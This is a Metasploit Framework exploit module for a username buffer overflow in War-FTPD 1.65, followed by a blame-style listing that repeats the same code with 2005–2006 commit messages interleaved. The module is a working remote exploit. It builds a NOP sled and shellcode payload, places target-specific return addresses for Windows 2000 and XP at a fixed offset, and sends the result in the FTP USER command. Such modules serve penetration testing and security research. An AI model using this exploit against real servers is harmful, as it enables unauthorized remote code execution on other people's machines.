metasploit-framework/modules/exploits/windows/ftp/warftpd_165_user.rb

require 'msf/core'

module Msf

class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote

	include Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'War-FTPD 1.65 Username Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow found in the USER command
				of War-FTPD 1.65.
			},
			'Author'         => 'Fairuzan Roslan <riaf [at] mysec.org>',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[
					[ 'OSVDB', '875'    ],
					[ 'MIL', '75'       ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],
				],
			'DefaultOptions' => 
				{
					'EXITFUNC' => 'process'
				},
			'Payload'        =>
				{
					'Space'    => 424,
					'BadChars' => "\x00\x0a\x0d\x40",
					'StackAdjustment' => -3500,
					'Compat'   =>
						{
							'ConnectionType' => "-find"
						}
				},
			'Targets'        =>
				[
					# Target 0
					[
						'Windows 2000 SP0-SP4 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x750231e2 # ws2help.dll
						},
					],
					# Target 1
					[
						'Windows XP SP0-SP1 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71ab1d54 # push esp, ret
						}
					],
					# Target 2
					[
						'Windows XP SP2 English',
						{
							'Platform' => 'win',
							'Ret'      => 0x71ab9372 # push esp, ret
						}
					]
				]))
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf          = make_nops(600) + payload.encoded
		buf[485, 4]  = [ target.ret ].pack('V')

		send_cmd( ['USER', buf] , false )


		handler
		disconnect
	end

end

end
Changed up the way mixins are handled, all exploits just require 'msf/core' and all current mixins will be loaded. Egghunter was moved to a mixin and generates based on target arch and platform. git-svn-id: file:///home/svn/incoming/trunk@3111 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 00:04:26 +00:00			`require 'msf/core'`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00
			`module Msf`

picky picky git-svn-id: file:///home/svn/incoming/trunk@3067 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:01:27 +00:00			`class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00
			`include Exploit::Remote::Ftp`

			`def initialize(info = {})`
			`super(update_info(info,`
Fixed bad target foo in ftp exploits Added TODO item about native packign git-svn-id: file:///home/svn/incoming/trunk@3070 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:46:53 +00:00			`'Name' => 'War-FTPD 1.65 Username Overflow',`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00			`'Description' => %q{`
			`This module exploits a buffer overflow found in the USER command`
tweaky git-svn-id: file:///home/svn/incoming/trunk@3079 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 17:41:32 +00:00			`of War-FTPD 1.65.`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00			`},`
extraneouslyness git-svn-id: file:///home/svn/incoming/trunk@3027 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-13 18:35:44 +00:00			`'Author' => 'Fairuzan Roslan <riaf [at] mysec.org>',`
BSD license the default for non-msfdev created modules. git-svn-id: file:///home/svn/incoming/trunk@3636 4d416f70-5f16-0410-b530-b9f4589650da 2006-05-06 16:34:39 +00:00			`'License' => BSD_LICENSE,`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`[ 'OSVDB', '875' ],`
			`[ 'MIL', '75' ],`
			`[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process'`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 424,`
			`'BadChars' => "\x00\x0a\x0d\x40",`
			`'StackAdjustment' => -3500,`
			`'Compat' =>`
			`{`
			`'ConnectionType' => "-find"`
			`}`
			`},`
			`'Targets' =>`
			`[`
			`# Target 0`
			`[`
			`'Windows 2000 SP0-SP4 English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x750231e2 # ws2help.dll`
			`},`
			`],`
			`# Target 1`
			`[`
			`'Windows XP SP0-SP1 English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x71ab1d54 # push esp, ret`
			`}`
			`],`
			`# Target 2`
			`[`
			`'Windows XP SP2 English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x71ab9372 # push esp, ret`
			`}`
			`]`
remove superfluous default git-svn-id: file:///home/svn/incoming/trunk@3024 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:50:05 +00:00			`]))`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00			`end`

			`def exploit`
			`connect`

			`print_status("Trying target #{target.name}...")`

			`buf = make_nops(600) + payload.encoded`
SEH frame stuff integrated into ftp modules, added generate_seh_payload git-svn-id: file:///home/svn/incoming/trunk@3081 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 18:30:56 +00:00			`buf[485, 4] = [ target.ret ].pack('V')`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00
tweaky git-svn-id: file:///home/svn/incoming/trunk@3079 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 17:41:32 +00:00			`send_cmd( ['USER', buf] , false )`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00

			`handler`
Fixed handler/disconnect order in FTP, fixes to metafile git-svn-id: file:///home/svn/incoming/trunk@3348 4d416f70-5f16-0410-b530-b9f4589650da 2006-01-08 14:27:59 +00:00			`disconnect`
bug fixes in x86 asm, jmp call additive, payload generation, and new exploit git-svn-id: file:///home/svn/incoming/trunk@3021 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-11 01:22:03 +00:00			`end`

			`end`

			`end`